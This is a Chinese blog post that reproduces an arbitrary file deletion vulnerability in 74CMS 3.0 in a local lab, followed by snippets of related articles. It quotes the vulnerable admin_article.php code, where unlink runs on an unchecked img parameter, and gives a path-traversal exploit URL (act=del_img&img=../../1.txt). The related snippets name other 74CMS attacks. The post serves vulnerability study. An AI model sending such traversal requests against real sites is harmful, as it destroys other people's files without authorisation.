74CMS 3.0 任意文件删除漏洞

最新推荐文章于 2023-11-06 21:23:02 发布
最新推荐文章于 2023-11-06 21:23:02 发布
阅读量597 收藏
点赞数
分类专栏: 漏洞复现 文章标签: 74CMS 3.0 任意文件删除漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36374896/article/details/84840174
版权

一、 启动环境

1.双击运行桌面phpstudy.exe软件
在这里插入图片描述
2.点击启动按钮,启动服务器环境

二、代码审计

1.双击启动桌面Seay源代码审计系统软件
在这里插入图片描述
2.因为74CMS3.0源代码编辑使用GBK编辑,所以首先需要先将编码改成GBK
在这里插入图片描述
3.点击新建项目按钮,弹出对画框中选择(C:\phpStudy\WWW\74cms),点击确定

漏洞分析

1.点击展开左侧admin目录,在弹出的下拉列表中双击admin/admin_article.php页面,右侧页面可以看到相关代码。

elseif($act == 'del_img')
{
	$id=intval($_GET['id']);
	$img=$_GET['img'];
	$sql="update ".table('article')." set Small_img='' where id=".$id." LIMIT 1";
	$db->query($sql);
	@unlink($upfiles_dir."/".$img);
	@unlink($thumb_dir.$img);
	adminmsg("删除缩略图成功!",2);
}

当act参数为del_img的时候会进入删除文件流程。 2.程序首先获取GET传输过来的ID,在获取GET传输过来的img图像,然后进入数据库查询ID,这部分对于漏洞利用并无影响。 3.最后调用unlink删除$img所存在的文件

漏洞利用

1. 首先访问admin/admin_article.php?act=del_img,紧接着在后面跟上要删除目录和文件。

http://192.168.91.136/74cms_Home_Setup_v3.0.0/upload/admin/admin_article.php?act=del_img&img=../../1.txt

在这里插入图片描述

在这里插入图片描述

执行前:
在这里插入图片描述
执行后:

在这里插入图片描述

浅笑⁹⁹⁶
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
74CMS3.0 宽字节注入后台+任意文件写入获取shell复现
信安小菜鸡的博客
04-30 1036
复现宽字节注入后台 进入后台 任意输入密码,填写正确验证码,开启burp抓包 把拦截的包发送给重发器,修改admin_name如图所示,再点击发送 成功进入后台 复现任意文件写入 如图所示构造post文件名和内容创建模板写入 然后再访问写入路径即可 原理分析 admin_login.php <?php /* * 74cms 锟斤拷录页锟斤拷 * ======================================================================
74CMS 3.0任意文件写入漏洞
浅笑996的博客
12-18 2090
一、 启动环境 1.双击运行桌面phpstudy.exe软件 2.点击启动按钮,启动服务器环境 二、代码审计 1.双击启动桌面Seay源代码审计系统软件 2.因为74CMS3.0源代码编辑使用GBK编辑,所以首先需要先将编码改成GBK 3.点击新建项目按钮,弹出对画框中选择(C:\phpStudy\WWW\74cms),点击确定 漏洞分析 1.点击展开左侧admin目录,在弹出的下拉列表中双...
74cms CSRF漏洞可以诱骗添加管理员
lfzhumengzhe的博客
03-17 2360
74cms CSRF漏洞可以诱骗添加管理员
74CMS 3.0 SQL注入漏洞后台.docx
07-07
74CMS 3.0 SQL注入漏洞后台演示,利用 sqlmap与burpsuit注入,需具备php基础
74cms -v3.0 存储型xss 分析与复现
最新发布
Au_Wind的博客
11-06 291
骑士cms3.0版本存储型xss分析复现
74cms_v3.0
07-09
74cms_v3.074cms_v3.0
74CMS 3.0 存储型XSS漏洞
浅笑996的博客
01-09 887
一、 启动环境 1.双击运行桌面phpstudy.exe软件 2.点击启动按钮,启动服务器环境 二、代码审计 1.双击启动桌面Seay源代码审计系统软件 2.因为74CMS3.0源代码编辑使用GBK编辑,所以首先需要先将编码改成GBK 3.点击新建项目按钮,弹出对画框中选择(C:\phpStudy\WWW\74cms),点击确定 漏洞分析 1.点击展开左侧link目录,弹出的下拉列表中双击a...
74cms代码执行漏洞
01-03
74cms代码执行漏洞 docker
74cms v4.2.X任意文件读取漏洞
09-06
**74cms v4.2.X任意文件读取漏洞详解** 在网络安全领域,74cms v4.2.X任意文件读取漏洞是一个重要的安全问题,影响了74cms的多个版本,包括v4.2、v4.2.3以及v5.0.1。这个漏洞允许攻击者通过特定的手段读取服务器上...
齐博CMS V7任意文件下载漏洞
09-07
# 齐博CMS V7任意文件下载漏洞 ## 漏洞影响 ``` 齐博cms V7 ``` ## FOFA ``` app="齐博cms" ``` ## Poc 综合验证和利用脚本见 Qibo_v7.py
骑士PHP人才系统(74CMS)源代码 v3.0
11-09
 骑士CMS-PHP人才系统源码,功能模块专业,系统以招聘求职模块与诸多实用辅助模块组成,专业、强大、实用、易用。在布局上科学严谨,给用户赏心悦目的视觉感受,而且程序开源免费、安全稳定,拥有WEB2.0新技术使系统拥有一流的用户体验。
74cms3.0个人版整合UC
10-21
个人版整合UC的要修改的文件都在里面了. 前提是你自己没有修改过其他的代码. 全部复制进对应的文件夹. 然后在ucenter里面添加应用。 把配置复制下来粘贴到74cms下的data目录下的config.php中.
74cms3.0添加HR工具箱模块
12-02
74cms3.0添加HR工具箱模块源码,下载后 覆盖即可并 导入sql
74cms PHP骑士人才系统 v3.5.1.rar
07-10
74cms PHP骑士人才系统是一套免费开源的专业人才网站系统,模板自由切换、后台管理功能丰富等。基于PHP的人才系统不是太多,希望74cms 骑士人才系统可以帮上你的忙。骑士cms人才系统PHP版 v3.5.1 bulid2014.11.28 更新:   新增 删除企业风采增加确认操作、订阅与意见反馈安全验证   修正 猎头头像显示不正常问题   修正 后台查看简历经历时间显示不正常问题   修正 简历转为word暴露邮箱问题   修正 触屏版简历、职位浏览次数异常问题   修正 修改简历期望职位不验证问
74CMS_4.2.3_任意文件读取_CNVD-2017-26183
02-22
""" 声明: 本文为 漏洞编号CNVD-2017-26183 ,即 74CMS 任意文件读取漏洞利用工具源码内容 文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 更多介绍请访问笔者博客:0xtlu.github.io 注: 1. uid+time() 构成图片名,由于网路问题 time() 会出现一定偏差导致无法的到文件的正确名称 2. 因本工具没有设置爆破 time() 功能,故多运行几次本工具大致可以,反之,需要爆破请求的时间戳 """
74CMS 3.0 SQL注入漏洞前台
浅笑996的博客
12-09 1648
一、 启动环境 1.双击运行桌面phpstudy.exe软件 2.点击启动按钮,启动服务器环境 二、代码审计 1.双击启动桌面Seay源代码审计系统软件 2.因为74CMS3.0源代码编辑使用GBK编辑,所以首先需要先将编码改成GBK 3.点击新建项目按钮,弹出对画框中选择(C:\phpStudy\WWW\74cms),点击确定 漏洞分析 1.点击展开左侧user目录,弹出的下拉列表中双击u...
(环境搭建+复现)74CMS模版注入+文件包含getshell
daxi0ng的博客
12-22 3291
0x00 简介 骑士CMS人才招聘系统是基于PHP+MYSQL的免费网站管理系统源码,提供完善的人才招聘网站建设方案。 0x01 漏洞概述 骑士 CMS 官方发布安全更新,修复了一处远程代码执行漏洞。由于骑士 CMS 某些函数存在过滤不严格,攻击者通过构造恶意请求,配合文件包含漏洞可在无需登录的情况下执行任意代码,控制服务器。 0x02 影响版本 骑士 CMS < 6.0.48 0x03 环境搭建 1、下载最新版74cms。 https://www.74cms.com/downlo
刷洞1--74cms3.5后台任意文件删除漏洞
river
05-04 1261
干了这么多年,突然觉得自己跟安全离的越来越远,真正的网络安全和代码安全息息相关,包括传统的审计、逆向、漏洞以及新型的AI安全研究。还是安安心心写代码,调漏洞吧,要不然也枉在这个行业工作。 对于小白来说,我还是从老版本的cms开始,借助大牛们的博客开始吧。http://0day5.com/archives/3981/ 使用74cms3.5 后台任意文件删除 elseif($act == ...
74CMS 3.0 CSRF漏洞
浅笑996的博客
12-27 1070
一、 启动环境 1.双击运行桌面phpstudy.exe软件 2.点击启动按钮,启动服务器环境 二、代码审计 1.双击启动桌面Seay源代码审计系统软件 2.因为74CMS3.0源代码编辑使用GBK编辑,所以首先需要先将编码改成GBK 3.点击新建项目按钮,弹出对画框中选择(C:\phpStudy\WWW\74cms),点击确定 漏洞分析 1.点击展开左侧admin目录,在弹出的下拉列表中双...
熊海cms文件包含漏洞
07-29
文件包含漏洞是一种常见的安全漏洞,它允许攻击者通过包含恶意文件来执行任意代码或获取敏感信息。 针对熊海CMS文件包含漏洞,你可以采取以下措施来缓解风险: 1. 及时更新:确保你使用的是最新版本的熊海CMS,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值